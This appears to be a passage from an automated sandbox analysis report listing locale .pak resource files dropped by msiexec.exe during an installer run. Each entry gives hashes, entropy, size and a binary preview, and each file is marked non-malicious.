Preview:	........_#t.e.....h.$...i.,...j.8...k.G...l.R...n.Z...o._...p.l...q.r...r.~...s.....t.....v.....w.....y.....z.....\|.....}.................................................!.....".....#.....(.....5.....D.....U.....h...........V.......................v.................1.......................`.......................Y.......................4.......................(.....v.................7.......................C.......................?.......................J.......................{...........-.....D.............................X.............................S.....r.....{.........../....._.....n...........#.....U.....e.................'.....0.............................J.......................D.......................d.......................D.......................".....h.......................p.................=.....{.......................\.......................T.................6.........................................P.................H.....[.............................x.............

C:\Users\user\AppData\Local\Programs\Setup\locales\am.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	744722
Entropy (8bit):	4.880240690992002
Encrypted:	false
SSDEEP:	12288:LMlGLQXTZou76VIx2TERZ3ej5dMNzLY5S9ZSVrBO0Pcx30jH8+F:Lc9XTZsVIxJRZuj5dMNzLY5S9ZSVrBOg
MD5:	3CFD7C5BB92AB72C63E003208A9E4529
SHA1:	165D2F69AB6A6E237F0FEC943B5577123CEFEA87
SHA-256:	12E9E1BEC1C46E5EA706157726E17A4429ACF288A5754FA183BD9B4CF7D3853B
SHA-512:	CD7C7837D758EA66ABC871503CDA6FE99FF45990405E60C1133E7C1F4CB29EE69723C9558BB2D3ECCB42948DA57351F4F095062616686AB2E255ACD3C86236F0
Malicious:	false
Preview:	........s#`.e.D...h.L...i.W...j.c...k.r...l.}...n.....o.....p.....q.....r.....s.....t.....v.....w.....y.....z.....\|.....}...................'...../.....7.....>.....E.....L.....M.....N.....S.....o.........................................8.................(.....T.....+...........q...........c...........n...................................q...........6.....L...........n.......................\|.........................................L...........:....._.........................................7.....f...........;.....a.................l..............................................:.................^...........N.....d.............................}...........O.....n...........r.................~.....,.................N................. .................T.....\|.....................................................H..................................p...........J...........,.....U.................r ..... ....W!.....!....l"....."....j#.....$....~$.....$.....%....d%.....%.....%....V&.....&....T'

C:\Users\user\AppData\Local\Programs\Setup\locales\ar.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	813209
Entropy (8bit):	4.897933532023867
Encrypted:	false
SSDEEP:	12288:EyBYh5/N/RaWH4gzWvwU5Twikcb5uNi3+D2qeTT:E3aR/5D+M
MD5:	3C2AB7363018DB1F20B90ACBC305CB4C
SHA1:	60B9CF453178AD0E60FAF20D137A0C7EABDE65C9
SHA-256:	3CA47B9C436723F837A53B2904B51EFDF13AB6CAD2F3EF4FE48A1115847ECCBF
SHA-512:	589BEB3E95E93F30341933C9B9826210E6BF3E9C1AD8F113D9D8A98FA5A526F81E454EE3357FB55D60D67A4890CE33E964BA2FA810E1771A6B7E82746492313A
Malicious:	false
Preview:	........4#..e.....h.....i.....j.....k.....l.....n.....o.....p.....q.....r.+...s.<...t.E...v.Z...w.g...y.m...z.\|...\|.....}...............................................................................B.....t.....^.....L.......................S.................{.....-.................r.....".................7.................(.................E.....\.......................-....................... .................S.............................5.......................,.....3..... .............................7.................u.................E.................'........................................._.....p......................."...........'.....h...................................y...........{...................................~...........%.........................................R.................l.................M.................:...........1.....~.................. ....4!....a!....."....."....."....(#.....#....6$....x$.....$.....$....X%....~%.....%....R&.....&....Y'....{'.....(

C:\Users\user\AppData\Local\Programs\Setup\locales\bg.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	848303
Entropy (8bit):	4.65032463396985
Encrypted:	false
SSDEEP:	24576:T3ChsqKaElYMdAs1axUjHh373Zj93aAK5kVDgQwRunpKd2ao57JqueRSnQFwN/6B:TChsqKaElYtUjHh373Z53a1kVDgQw1dn
MD5:	A69F6075863D47B564A2FEB655A2946F
SHA1:	062232499FF73D39724C05C0DF121ECD252B8A31
SHA-256:	A5EB7038ED956BAD7704A722F05691474FF709DFFBAD92B8E31DBB869AD58334
SHA-512:	930CE3938AA02A8BCC609A64BD86B7E6164D63BAAD157A980FD079859A6BEE5DB87BD1F7A74A71108F8368BC9C6154BF14A2DBA1ABF269F572BC262614BCF1DB
Malicious:	false
Preview:	........c#p.e.$...h.,...i.4...j.@...k.O...l.Z...n.b...o.g...p.t...q.z...r.....s.....t.....v.....w.....y.....z.....\|.....}...........................................".....)..........+.....0.....R.....k.............................-.....q.....5...........U.......................8.....v.....l.....).............................b........... ........................................~.....z.....<.............................>.....t.....<...........Q.....{.....g.....'.............................j..........._.................E...........x.............................f...........C...........3.....a.........................................L.....l...........}.............................f.................o...........I...........z.................{...........;..........._...... ....z ..... .....!....O"....."....8#.....#....j$.....$.....$.....%....D&.....&.....&.....'....T(.....(.....).....).....*....t+.....+.....,....S-.....-................./...../.....0.....0....<1.....1.....1.....2.....3.....4

C:\Users\user\AppData\Local\Programs\Setup\locales\bn.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	1094739
Entropy (8bit):	4.273606074036768
Encrypted:	false
SSDEEP:	3072:PAUxhq6CLf6bXs8iQ2Zc2EadKZ0ZfQ0/QeIyTtPukkBBbpUDDM5JiXldW:4K46CjYYZ82IypPubBbf5IlI
MD5:	D43CE80DDCA3FAB513431FA29BE2E60A
SHA1:	3E82282E4ACFEC5F0ACA4672161D2F976F284A0C
SHA-256:	87670FF2CEB1EBC38FCE2C3B745AC965F3DE5DE3133D99ED33933A8F3E99D874
SHA-512:	1D33CA9BACB91EF328F89A14777A704000BF30FE59AA1CBBBFF34D8BAD266C98D78C9E411E289E834E76EB721DD98934426A565CD5B3436D5A103ABE37F7612A
Malicious:	false
Preview:	........^#u.e.....h."...i.3...j.?...k.N...l.Y...n.a...o.g...p.t...q.z...r.....s.....t.....v.....w.....y.....z.....\|.....}........................................... .....'.........../.....0.....5.....Z...........................................................h.....................................................Q.................?.....w.....,...........1.....T.....{.....Y...........E.....+...................................+.....Z.....'...........9.....n.....i.....S.................A.....9...........3...................................E.................D.................,.................%.....c.....!.................I...................................b.......................$.....u........................ ..... .....!....."....2#....z#.....$.....$.....$.....%.....%.....&.....'....1'.....(.....(.....)..............L+.....+.....+.....,....^-.....-.....-.........../....L0.....0.....1.....3.....3....14....i5....k6.....7....u7....W8.....9.....9.....9.....:....M;.....;.....;.....<.....=

C:\Users\user\AppData\Local\Programs\Setup\locales\ca.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	515554
Entropy (8bit):	5.412339344998089
Encrypted:	false
SSDEEP:	12288:KhBp7kcELygV3z5PAF4N3Mw2juwHzejm0t3lvq8E9oCRaIs3cmlLEY2CJkEydROC:Khh4V8RPS9lMN4MZRg5P56iq
MD5:	2D30C5A004715BC8CD54C2E21C5F7953
SHA1:	FED917145A03D037A32ABAC6EDC48C76A4035993
SHA-256:	D9C45D55A9A5661063B9BBEBB0615DE8F567F3925D04FD10938DA9617C6220E0
SHA-512:	B3803551F53D290D8839789F829AFC9C1E12052C81BA20D5E01FB3D2BACD5D1E97BD4C05074322EED17FDEC04C9176C655076FAEC8A3AEF17C39FB999E0C1FCF
Malicious:	false
Preview:	........e#n.e.(...h.0...i.8...j.D...k.S...l.^...n.f...o.k...p.x...q.~...r.....s.....t.....v.....w.....y.....z.....\|.....}...........................................&.....-.........../.....1.....K.....d.................G...........C.....b...........7.....~...........,................./.................*.....G.................).....<................. .....1.................].................}.................X.......................t...................................<.....W...........w.................^.......................J.......................(.....y.................(.......................7.......................$.....s.......................H.....t.................8.....l.....}...........o.................5.......................0.....w.................G.....~.................y.................V.......................9.......................C...............................................&.......................t.......................k.......................d.................&.

C:\Users\user\AppData\Local\Programs\Setup\locales\cs.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	530593
Entropy (8bit):	5.852935430786663
Encrypted:	false
SSDEEP:	12288:ljXB+Hdo1ryvJvtQW5EK8VPDNOQ3SCmPs:ljXwHO1uvJ195EK8V5ObCmPs
MD5:	06E3FE72FDC73291E8CF6A44EB68B086
SHA1:	0BB3B3CF839575B2794D7D781A763751FE70D126
SHA-256:	397134D1834F395F1C467A75D84EF2E8545CB0F81E94DBE78B841FBBDAAD802D
SHA-512:	211594C30AD4F5CA8813596B59751168C60DFA0D13F24F2AA608FCE82D21C2DE3DE69FE007C4BDE1602DA8AA7EA81EC0F15E173ABC1224362C36B493B425B425
Malicious:	false
Preview:	........K#..e.....h.....i.....j.....k.....l.*...n.2...o.7...p.D...q.J...r.V...s.g...t.p...v.....w.....y.....z.....\|.....}.....................................................................................1.....F...........t.................R...................................W.....p...........U.......................k.......................Z.......................j.................P.................A...........(.....a.....y...........L.........................................P.................-.............................d.......................E.......................4.......................H.......................C.......................8.......................P.......................\|...........?.....V.............................g.......................m.......................s...........(....._................. .....4.................G.....\...........6.....w.................}.................[...........,.....M...........0.....Z.....o...........%.....J.....^...........8.....r.

C:\Users\user\AppData\Local\Programs\Setup\locales\da.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	479902
Entropy (8bit):	5.456625778597649
Encrypted:	false
SSDEEP:	6144:+luvzrGLXfBlzV0qV5cU3sVEs7a7wlTwUJwa7obRR2vJub51NrXBDUd4JTGqfwI:+HbzszaoQR5rrBTpz
MD5:	1939FAA4F66E903EAC58F2564EEB910E
SHA1:	BACE65EE6C278D01CCF936E227E403C4DFF2682D
SHA-256:	0B9DA7BD6531A7EBE7D8188B320C0953ADCFBAF654037F8265261A12E63D3C87
SHA-512:	51588D2FE724E6C407724EA6F46883DED39397AF744EFFAF672F75952A6A734E61E93E59F446080317F2A2B3FA1B45E7405F90FE0B226C44C9F3DD9A4E130A87
Malicious:	false
Preview:	........j#i.e.2...h.:...i.K...j.W...k.f...l.q...n.y...o.~...p.....q.....r.....s.....t.....v.....w.....y.....z.....\|.....}.........................#.....+.....2.....9.....@.....A.....B.....D.....R.....b.....v.................v.................5...................................U.....q...........A.....q.................4.....[.....h.................F.....T.................L.....f...........R.........................................B...................................T.....n.............................U.......................<.............................n.......................f.......................k......................._.......................>.....d.....n...........'.....T.....b...........].......................s.......................P.....n.................-.....J.....Z...........B.....\|.................k.......................v......................h.................&...................................3.....b.................^.....p.................$.....1..................

C:\Users\user\AppData\Local\Programs\Setup\locales\de.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512832
Entropy (8bit):	5.50981730028679
Encrypted:	false
SSDEEP:	6144:Vsu6moWkxlRnY43K7UpHa63gXya/nOdxIHa3AnO1a265QM5GR6mszMRQI2Cga:VsU4e43K7UpxgCaPoCwM5Vmv2Cga
MD5:	2163820CD081FDD711B9230DC9284297
SHA1:	C76CC7B440156E3A59CAA17C704D9D327F9F1886
SHA-256:	6D787033C94755CC80C187ED8A9DE65808BB4D7968354BBB94B7868AC2E8D205
SHA-512:	920FA2A10F7AA7F1F6D911FE2A77EDED0384617D8FD863943AFD99A584DAB3FB2EA3E5D2E20BCA529689A99FDF303912007F2918C62482D8A90194A810F6E535
Malicious:	false
Preview:	.........#..e.b...h.j...i.{...j.....k.....l.....n.....o.....p.....q.....r.....s.....t.....v.....w.....y.....z.....\|.$...}.6.....>.....C.....K.....S.....[.....b.....i.....p.....q.....r.....t...................................<.................)...................................B.....\...........R.........................................>...................................9.....[...........q.................L...................................[.....m...................................C.................(.......................9.......................L.......................{...........E.....\...........J.......................x.................*.......................Y.............................N.................%.......................................................................X.................D................./.....F...........+.....W.....j...........a.................8.............................7.....s.................................../.......................X.............

C:\Users\user\AppData\Local\Programs\Setup\locales\el.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	929418
Entropy (8bit):	4.738354677437668
Encrypted:	false
SSDEEP:	24576:ovf5YcXPdGgx11hxi9c9N+JXDsSYSmqHMuD2fpoLwj3BAVH8+VdQ5tNDQo32Etfd:2f5YcXPdGgx11hxi9c9N+JXDsSYSmqHe
MD5:	A14D8A4499A8B2F2F5908D93E2065BF7
SHA1:	1473A352832D9A71C97A003127E3E78613C72A17
SHA-256:	EB46D9860835B69D33B2583D1E52B20238B666B967BF00906424E3C8A161ED64
SHA-512:	427271D12590F8EA3F11B83E4C0CE79C55C289573C5F6E5C70C789B28A5181F295A3C9B1A4BDD1F731F338E6EDB1E06318EA6410CEAC546128A84FF8F2EC0B40
Malicious:	false
Preview:	........f#m.e....h.2...i.:...j.D...k.S...l.^...n.f...o.k...p.x...q.~...r.....s.....t.....v.....w.....y.....z.....\|.....}...........................................&.....-.........../.....1.....X.....}.....................................................8.....n.....v.....J...........(.....K...........`...........]...........C.....d.............................................../.....7.....1...................................,.................A.....l.....].....................................................I.................l...........b...........,.................V.....1...........w...........k.....7.......................i.......................s.......................k.......................................... ....^!.....!.....!.....".....#....V#....r#..../$.....$.....%....J%....7&.....&....s'.....'....p(.....)....V)....})....H.....+....h+.....+.....,....5-.....-.....-...../....30.....0...."1....#2.....3....~3.....3.....4.....5....Q6.....6....=7.....8....q8.....8.....9.....:.....;

C:\Users\user\AppData\Local\Programs\Setup\locales\en-GB.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	418411
Entropy (8bit):	5.526282387769971
Encrypted:	false
SSDEEP:	6144:A8iCFs0mZ2dXipvrIQoqbh7GMP9eRT/LfaY1+/845prSQBE0RbhU:AJCyeXipvrI7IGMuT/7o5ZSsU
MD5:	9D9121BDC9AF59B5899CE3C5927B55D8
SHA1:	568626A374CD30237C55B72C74B708DA8D065EC1
SHA-256:	F4D45CCC89834376F35D4D83FE5B2D5112B8CC315FCB03228720749AAE31C805
SHA-512:	149A8ACF256DC12F62706F72AD8EC88CBFDF7F8DC874BCD9FACF484CDB00E7C5787F5E1BBC12B5BBE1B19B6524E7E8A1C7DBA2838ABEB9AAFA3CE89795FD22AE
Malicious:	false
Preview:	.........#..e.....h.....i.....j."...k.1...l.<...n.D...o.I...p.V...q.\...r.h...s.y...t.....v.....w.....y.....z.....\|.....}.....................................................................................>.....O...........".....i.....\|........... .....Q.....a...........!.....].....s.................G.....\.......................%.....n.......................7.....\|.......................o.......................].......................3.....^.....n.......................9.................D.....X.............................6.....q.............................:.....F................. .....3.............................L.............................Q.....y.......................;.....F.................<.....Q.............................a.............................a.......................5.....j.......................'.....6.....................................................~.................<.................3.....P.......................-.....t.......................C.............

C:\Users\user\AppData\Local\Programs\Setup\locales\en-US.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	421711
Entropy (8bit):	5.516302021610083
Encrypted:	false
SSDEEP:	6144:MOoiE2KSqdBEuUu6/9meKMP9e7X9ifaY3yzq5J7SKn0F/lOSwH:n5EC2B4bKMwX9cj5hSwSwH
MD5:	626F30CFD9AD7B7C628C6A859E4013BD
SHA1:	02E9A759C745A984B5F39223FAB5BE9B5EC3D5A7
SHA-256:	0FD74BB69AD35B3F9391FA760BF0EB0EE73D2BEA0066244577EF2ABD269513DE
SHA-512:	9CE902F21FEF70C5B5AF444B532B36C9A00D896878CB4021C9B1DC07AA3277D956BCA65EE0ADB68467EEC113E535B60A8A5FB5414C7D0CA761CEAE5C43B7D9A9
Malicious:	false
Preview:	.........#..e.Z...h.b...i.j...j.v...k.....l.....n.....o.....p.....q.....r.....s.....t.....v.....w.....y.....z.....\|.....}.%.....-.....2.....:.....B.....J.....Q.....X....._.....`.....a.....f.....s.............................w.................(.....u.......................u................. .....k.......................@.....i.....w......................7.............................g.......................Y.......................5.....\|.......................K.....w.................K.............................2.....A.............................%.....b.......................7.....i.....\|.................@.....L.............................V.............................[.......................J............................M.....c.............................m.......................=.......................$.....[.....v.................$.....N.....^.................;.....S...........$.....m.....{...........7.....n.................-.....Y.....h.............................z.............

C:\Users\user\AppData\Local\Programs\Setup\locales\es-419.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	508230
Entropy (8bit):	5.385230992997236
Encrypted:	false
SSDEEP:	3072:iEsyQDjcRy2VdU1P2BCA6bKVjnE4rHOniSb8p5Yl+lblmwoab5uIay5LlZi+SLFv:iEsyQvt2ECiOX3p5YWm85wLFaoImYA
MD5:	6F4613A4A88AF6C8BD4EF39EDEEE3747
SHA1:	C8850A276D390DF234258D8DE8C6DF79240C8669
SHA-256:	8F7B8776E61E3ED5AA33B1A571AC834653B54B12A499D956B95D567B7E1BA987
SHA-512:	E5933DCB2AAAA2018BA8B13F4AF3DC8A950640AC60ACB1B56AD6DE24541701D0FFC1F4CB28C7932AF924BFD673EDCEE20BF649156AB95EA9499EC43C703EA141
Malicious:	false
Preview:	........q#b.e.@...h.H...i.Q...j.]...k.l...l.w...n.....o.....p.....q.....r.....s.....t.....v.....w.....y.....z.....\|.....}...................!.....).....1.....8.....?.....F.....G.....H.....J.....\.....k.................*.................9.................V.....n...........~.................u...........,.....G.......................'.........................................]...................................e.................).................<.....S...........?.................:.................9.............................p.......................g...................................2.....E.................G.....S.................0.....;.........................................,.....<.........../.....{.................V.......................X.................I.........................................t.......................j...................................).....C...........X.................c...........".....P...........6.....z.................'.....J.....]...........N.............

C:\Users\user\AppData\Local\Programs\Setup\locales\es.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	507855
Entropy (8bit):	5.361522715042697
Encrypted:	false
SSDEEP:	6144:NPKK+SmGmQaXDFY1+hM03GgDE7pF+E8y1l4Fj05fYrK3osSl6PZjHu:ZKKDmXXDdq01ap4y1lEj05Qr0osTO
MD5:	A24E01A4947D22CE1A6ACA34B6F2A649
SHA1:	750C2550465C7D0D7D1D63AD045B811B4A26DC55
SHA-256:	848D422BE1B8FAE74786ED6D6DFA7DD2E97B798B4A9BA1D929085E425B2A54E0
SHA-512:	02FC4CE96AA523EBC204243BBEC3347B09CB20BCC0BA66CF9532A6FB26C48F7F2396BBB833F1916F8F081FFC9C6CD2DE07315E66C5115042A0B44270FA4468C1
Malicious:	false
Preview:	........q#b.e.@...h.H...i.P...j.\...k.k...l.v...n.~...o.....p.....q.....r.....s.....t.....v.....w.....y.....z.....\|.....}................... .....(.....0.....7.....>.....E.....F.....G.....I.....\.....l................./...........'.....B...........$.....j...............................................9.....T.................>.....N.................8.....I...........C.................7.......................{...........).....:.................F.....[...........O.................G.................0.....................................................v................. .......................2.......................'.....{.......................b.......................Y.......................h...........$.....>................. .....=.......................4.................@.....S...........H.................-.....y.................!.....w.................7.......................}...........a.....x.............................w...........!.....5.............................\|...........$.

C:\Users\user\AppData\Local\Programs\Setup\locales\et.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	460480
Entropy (8bit):	5.4631405749616855
Encrypted:	false
SSDEEP:	6144:2Ve10hVbtjvP4cCJ1ONRCOeP+sEmThFC0jmFohH4fSpY0lgtim0DM5Oju43sPZCo:+eQtjvP4cnre/tHmFoh99M5Oj+x
MD5:	82A07B154CB241A2EBE83B0D919C89E9
SHA1:	F7ECE3A3DA2DFB8886E334419E438681BFCE36CF
SHA-256:	84866CCAF2EC39486F78E22886BEF3FE75C1EB36E7A7C071471040E12018DB28
SHA-512:	07319D155BDF9E27762ECB9EF6871430BEF88B1AF129450EB65AA798EBAA4E02B25B0CF9BDE3B12FF1B04A3D14241569B73D6AF895D2E85DD7B24D393E7317E9
Malicious:	false
Preview:	.........#T.e.\...h.d...i.u...j.....k.....l.....n.....o.....p.....q.....r.....s.....t.....v.....w.....y.....z.....\|.....}.0.....8.....=.....E.....M.....U.....\.....c.....j.....k.....l.....n.....~.......................9...........0.....K.................J.....]...........?.....\|.................[.......................S.......................B.....m.................A.....j.................f.........................................!.......................1.......................^...........!.....8.......................:.............................e.......................].......................i.................#.....s.......................j.......................j...................................5.....M.......................0.......................5.......................'.................#.....O...............................................!.................%.....@...........;.................)...................................&.....3.............................e.............

C:\Users\user\AppData\Local\Programs\Setup\locales\fa.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	756165
Entropy (8bit):	5.0211117057378845
Encrypted:	false
SSDEEP:	12288:DCD38/+r28u313uyqoe+slXcfqEdvRmXzoT4WmdAQifaQ2XxFHGk62BtMX9OxRdn:DCDo+r28u313uyqoe+seqIvRmXzoT4Ws
MD5:	C770CFB9FBABDA049EB2D87275071B54
SHA1:	20E41B1802C82D15D41FADAF3DCD049B57891131
SHA-256:	DAE7E7C87026CD4E8A4CD813CC71DEF32C86ED47865CE6DA5383B66B7021C5BC
SHA-512:	CDA117A60C853F12ADE579C34FCE22D992B33DF1F5001A237767B6E642D5C775C3387BCEE05D6557FE5A2F6235F93258954A697D3B9812D2550C4801869F4751
Malicious:	false
Preview:	........##..e.....h.....i.....j.....k.....l.....n.....o.....p.....q.....r.....s.....t.#...v.8...w.E...y.K...z.Z...\|.`...}.r.....z.............................................................................:.................q...........D...........[.....}.....E.......................o.......................G...........9.....L...................................%.....g...........P...........E.....m...................................L.................o...../.......................\.................{...........7.....[...........c.................9.................&...........^.................S...........3.....J...........V................................... ...........F.................F...........R.....u...........z.................t...........Y...........).................6.......................!.................<.....W......................./...........b........................ ....m!.....!....P"....."....R#.....#....=$.....$....3%....V%.....%....T&.....&.....&....J'.....'....6(....^(

C:\Users\user\AppData\Local\Programs\Setup\locales\fi.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	470482
Entropy (8bit):	5.425789814492222
Encrypted:	false
SSDEEP:	6144:K+2JevEiMD19i//8e36bwFh20RtrZs6TIOEysaI9LL59YWyHrE5WacpoPWmMWO4C:K+9Hs19S/rKJam59YdHrE5WaipKYn
MD5:	FE011231BBC8B3A74652F6A38F85BC88
SHA1:	2B851E46738D466B3A5A470DE114D15051B6EB6B
SHA-256:	7A3249514585491EB47FE4B579EDC27CCC48761E7AD6BC11D113B257132C5DD2
SHA-512:	2A4E5C1409347B4B514556C81EF32C8AE118ADD28E3469717B13045C8424FED9B817C7988629050ED3E732E0CDCA181891B6A8B9E64E4C8D65F004D7C8DB9796
Malicious:	false
Preview:	.........#..e.....h.....i.....j.....k.....l.....n.....o.....p.....q.....r.....s.....t.....v.....w.+...y.1...z.@...\|.F...}.X.....`.....e.....m.....u.....}.................................................................o...........B.....U.................N.....a...........>.....x.................b.......................W.......................(.....H.....X.................*.....D...........'.....i.................5.....a.....w...........7.....f.....{...........8.....i.................q.................).....\|.......................O.....r.......................4.....@.............................o.......................T.......................0.............................f.......................y.................&.....k.......................K.....m.................I.....m.....\|...........H.......................1.....H.....W.................8.....J.................?.....Y...........\.................-.......................=.............................Z.....s.................7.....b.

C:\Users\user\AppData\Local\Programs\Setup\locales\fil.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	531993
Entropy (8bit):	5.200104622437094
Encrypted:	false
SSDEEP:	6144:VJPfDjGZPitD/ty3DQZIbpiWFevNnGFZ338mC5oVms68ARrq8:VhGAodn7C5Sm7
MD5:	7354DE570C8132723C8E57C4CCB4E7C4
SHA1:	177780FAF460E3C8A643A4D71C7A4621345A8715
SHA-256:	91149190C856195FB330605686ACF09C7197E5B7EFE37FE2A7C76BB8FB08CC89
SHA-512:	A8487A6A7FD46D62E78CA4262DE49E12C120268561EE61A642C45EFA48116EDEBEB40CF9E8BE229DB0BBF06BB6B5457CC54399A08EE6A603E5540EF5CA482798
Malicious:	false
Preview:	.........#..e.....h.....i.0...j.<...k.K...l.V...n.^...o.c...p.p...q.v...r.....s.....t.....v.....w.....y.....z.....\|.....}.................................................%.....&.....'.....,.....9.....N.....d........................................!.....f...........#.................7...........,.....p.................P.......................c.................:.............................0.....~...................................n.................4.........../.....y...........(.................6................. .....=....................... .....u.......................z...........%.....;.................=.....L.................A.....O.................A.....O.................D.....R...........S.................$.............................p.......................m.................7.................'.......................2.................C.....^...........R.................[...........^.....t.............................{.................4.................................. .....\.

C:\Users\user\AppData\Local\Programs\Setup\locales\fr.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	550280
Entropy (8bit):	5.387288883804832
Encrypted:	false
SSDEEP:	12288:V06pImfHXFZLiQphDDq6QuaMV5wKzvOtXDZ/MYnYtgLXfyzEi5Qx0JSWkv40wCns:VNfqsVaC5WK
MD5:	D8B4BC789A0C865FB0981611FB5DCDBC
SHA1:	33F9F03117F0BBA56A696F2FA089BA893EE951A2
SHA-256:	52AA0A18ACE6347B06A89E3851A1B116812C022DBE41DA8942278878B5409CEE
SHA-512:	58D19E5A3C68C901FA2A0C327A45B410AB9B9E6C39298DB48EED25345453DCE1A4633AFE6277CF53ED558E160065B89C0E38A32CAECED47E79783DBDA4D74F26
Malicious:	false
Preview:	........S#..e.....h.....i.....j.)...k.8...l.C...n.K...o.P...p.]...q.c...r.o...s.....t.....v.....w.....y.....z.....\|.....}.........................................................................&.....4.....F.....U.......................<...........#.....c.....{.........................................;.....d.................D.....T...........(.....c.....x...........m................._.................0.................M....._...........7.....t.................r.................a...........M.....m...........2.....c.....z...........,.....V.....h...........2.....h.....z...........J.......................a.......................\.......................I.....u.................H.....z...................................p.......................b.......................O...................................g.................J.....g.....}...........i.................H...................................m.................r.................j...........6.....O.................+.....?...........+.....p.

C:\Users\user\AppData\Local\Programs\Setup\locales\gu.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	1074089
Entropy (8bit):	4.312676397057413
Encrypted:	false
SSDEEP:	3072:QIEt+9TXuSm4vSDnlrjqy5HIwjAwREJKVMjNiT7llj63rFWlPvpMi5eQWiYJ+WRc:QIEtYXuLUKlrjTa4/WP5c4h6vFX
MD5:	225167DBDF1D16B3FAFC506EB63F6D1D
SHA1:	8651B77F41E3C5B019CCB124A7C8F6449A04B96C
SHA-256:	FF379DD77136B9B85E7E9FCB5B261ACE9C6D9184AF3BA2DEA35B1757B9BAB6D9
SHA-512:	A353D36A87B6608578816056647DE45A456F9012D399B2CB5CB7B9DE867A370FCAF1A90D293F367B9B678D13991294425ABD85CF77E971AFA0D3E9C316952115
Malicious:	false
Preview:	........h#k.e.....h.6...i.P...j.\...k.k...l.v...n.~...o.....p.....q.....r.....s.....t.....v.....w.....y.....z.....\|.....}................... .....(.....0.....7.....>.....E.....F.....G.....L.....n.......................2...../...........<...../...........s.......................j.................1.............................b...........B...........,.....L...../...........J.......................&.....h.....>.............................e.................................................................k...........@.....g..... .................=...................................m.......................v.......................M.................a...........h...........:...........E.....d.....w...........,.....b...... ..... ...."!....K!.....!....P"....\|"....."....Q#....2$.....$.....$.....%.....&....D'.....'....i(.....)....L)....~)....a*....'+.....+.....+.....,....t-..........6.....]/.....0....X1....y1.....2....y3.....4....`4....L5.....6.....6.....6.....7....C8.....8.....8.....9.....:....n;

C:\Users\user\AppData\Local\Programs\Setup\locales\he.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	661497
Entropy (8bit):	4.632075612159233
Encrypted:	false
SSDEEP:	12288:9xsskchOxS28YeqhCdrNGmnSWqo/IQXOl60pACDXbheQCap125nVwo9Ps5plm7oM:9Bk7g5Wof
MD5:	D8320B09C1E138B00655DB0802687BCA
SHA1:	01616BDA6B22C70D5C6440B7451AE736EB1336CB
SHA-256:	E3336668AAD9AD661E7F589F1A405B9C95FC771261CDF9328ACA88F4BE763374
SHA-512:	5A91596D7E82DC3D692083AE45AFF6FDBDDD08CA17F49A020E0769F98C4218B6C9CD31E54524473B7CDCCBEBF4D7A7F0FF23B5075A1E1ADA5CC35C3FD0172BED
Malicious:	false
Preview:	........D#..e.....h.....i.....j.....k.....l.%...n.-...o.2...p.?...q.E...r.Q...s.b...t.k...v.....w.....y.....z.....\|.....}...............................................................................(.....A.....^.....#...........b.........................................3.................8.................).................g.....x...........[.................;.............................*.....\|...........:.................8.........../.....u.........................................S.................j.................).................E.....X...........t.................^.................#.................Z.....o...........U.........................................V.............................<.................-.......................]...................................O.....n.............................v.........................................4...........I.......................I.............................[...........;................./.................K.....o.....$.............

C:\Users\user\AppData\Local\Programs\Setup\locales\hi.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	1128743
Entropy (8bit):	4.289393956482131
Encrypted:	false
SSDEEP:	3072:CaaJyCmCd3RTaIEDOGV/BB0ZV1dsuOlRLXW3XHij0TByntDPtDlSp1s4u/8WLw3k:aQDa3RTaISOOz5j5thGM
MD5:	9E1788B0F3E330BAF2B9356A6C853B20
SHA1:	A2F4B37A418669E2B90159C8F835F840026128D9
SHA-256:	C640313E10E985A58D16F928D2428AE278421A070D948733AC68FDF7312090FD
SHA-512:	B9A577E084F8DAEB53FAD0A9423661C99CAB272125899A16B0B052606A2CB88F823137F3A21B5C06B10E0235321B7FACA84CD759BF406FB2DD02C2F598E92CB5
Malicious:	false
Preview:	........0#..e.....h.....i.....j.....k.....l.....n.....o.....p.....q.....r.)...s.:...t.C...v.X...w.e...y.k...z.z...\|.....}.....................................................................................B.....{................._.................}...........B.....p...................................&.....U.....(...........6.....f.......................<.....#...........&.....c...........l...........$.......................W.....>...........l.......................$.....V.................S...........g...........m...........Q...........U.....................................................3.......................#...................................B.................j.....".....\|......................., ....\ .....!.....!....."....<"....."....X#.....#.....#....p$.....%.....%.....%.....&....a'.....'....;(.....(.....).....).....).....*.....+....[,.....,.....-....A............/....x0.....1.....2.....2.....3.....4....+5....m5.....6.....7.....8....t8....h9....&:.....:.....:.....;.....<....$=

C:\Users\user\AppData\Local\Programs\Setup\locales\hr.pak

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512611
